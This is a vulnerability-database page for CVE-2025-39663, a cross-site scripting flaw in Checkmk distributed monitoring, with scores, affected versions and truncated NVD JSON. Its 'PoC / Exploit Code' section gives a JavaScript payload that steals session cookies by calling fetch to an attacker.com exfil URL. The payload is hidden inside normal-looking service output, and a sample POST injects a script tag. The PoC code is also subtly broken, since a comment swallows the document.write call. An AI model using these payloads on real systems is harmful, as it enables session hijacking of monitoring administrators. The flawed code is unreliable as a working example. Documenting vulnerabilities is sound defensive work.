Security Vulnerability Report
CVE-2025-39663 CVSS 8.4 HIGH

CVE-2025-39663

Published: 2025-10-30 11:15:32
Last Modified: 2025-12-03 20:06:17

Description

Cross-Site Scripting (XSS) vulnerability in Checkmk's distributed monitoring allows a compromised remote site to inject malicious HTML code into service outputs in the central site. Affecting Checkmk before 2.4.0p14, 2.3.0p39, 2.2.0 and 2.1.0 (eol).

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.3.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.3.0:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.3.0:p10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.3.0:p11:*:*:*:*:*:* - VULNERABLE
Checkmk < 2.4.0p14
Checkmk < 2.3.0p39
Checkmk 2.2.0
Checkmk 2.1.0 (EOL)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-39663 PoC - Checkmk Distributed Monitoring XSS
// This PoC demonstrates how a compromised remote site can inject XSS payload
// into service outputs that will be displayed on the central site

// Step 1: Prepare malicious XSS payload
const xssPayload = '<script>\n // Steal session cookies document.write(\'<img src=\\'' +
  window.location.origin + '/log?c=' + encodeURIComponent(document.cookie) +
  '\\' />\');\n // Alternative payload for credential theft\n' +
  ' fetch(\'https://attacker.com/exfil?data=\' + btoa(document.cookie));\n</script>';

// Step 2: Inject payload into service output on compromised remote site
// This would typically be done through the Checkmk API or by modifying
// the checkmk_agent configuration on the remote site
const injectPayload = {
  site_id: 'compromised_remote_site',
  check_type: 'custom_check',
  service_description: 'Critical Service Status',
  output: 'OK - Service running normally' + xssPayload,
  performance_data: 'time=0.123'
};

// Step 3: The payload will be synced to central site and stored
// When admin views service details, XSS executes in their browser

// Alternative: Direct API exploitation (if applicable)
/*
POST /check_mk/webapi.py HTTP/1.1
Host: central-site.example.com
Content-Type: application/x-www-form-urlencoded

action=push_status&site=compromised_remote&
output=<script>alert('XSS')</script>&
service_description=TestService
*/

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39663", "sourceIdentifier": "[email protected]", "published": "2025-10-30T11:15:32.400", "lastModified": "2025-12-03T20:06:16.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting (XSS) vulnerability in Checkmk's distributed monitoring allows a compromised remote site to inject malicious HTML code into service outputs in the central site. Affecting Checkmk before 2.4.0p14, 2.3.0p39, 2.2.0 and 2.1.0 (eol)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.3.0", "matchCriteriaId": "1D767AB0-24B0-4BDE-8B7F-90BD7A40E496"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "83202950-840A-4CB7-AD96-CE62E84FABD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p1:*:*:*:*:*:*", "matchCriteriaId": "310A2FA2-633A-48FB-A5C2-9A9A922E72E2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p10:*:*:*:*:*:*", "matchCriteriaId": "3C0F1DC8-D9DF-4A7A-80DC-618FAB091375"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p11:*:*:*:*:*:*", "matchCriteriaId": "9B0A1E3E-1B5A-4346-95BC-DE6FF6EE14CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p12:*:*:*:*:*:*", "matchCriteriaId": "EB52B2A7-BDC1-4A4F-ABAF-69C1BA8E83C2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p13:*:*:*:*:*:*", "matchCriteriaId": "9F89225F-6969-4D89-B889-9CB09972825B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p14:*:*:*:*:*:*", 
"matchCriteriaId": "2A1B23EA-4571-4E4E-80BC-FD76FFD83FFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p15:*:*:*:*:*:*", "matchCriteriaId": "625A6998-5DAE-4538-9760-20523CCE501F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p16:*:*:*:*:*:*", "matchCriteriaId": "6EFD4461-2C37-418F-90AD-3A956B2D91C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p17:*:*:*:*:*:*", "matchCriteriaId": "88523633-844C-41FE-ADF1-74D6AA2BCE6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p18:*:*:*:*:*:*", "matchCriteriaId": "5DA03E01-06D1-4E18-9C7B-CB6E49E5954B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p19:*:*:*:*:*:*", "matchCriteriaId": "91F171B6-7F9A-4B9B-B53D-277FE74124F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p2:*:*:*:*:*:*", "matchCriteriaId": "7D1993E3-C4F9-4D78-BD02-A0B22D93BF1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p20:*:*:*:*:*:*", "matchC ... (truncated)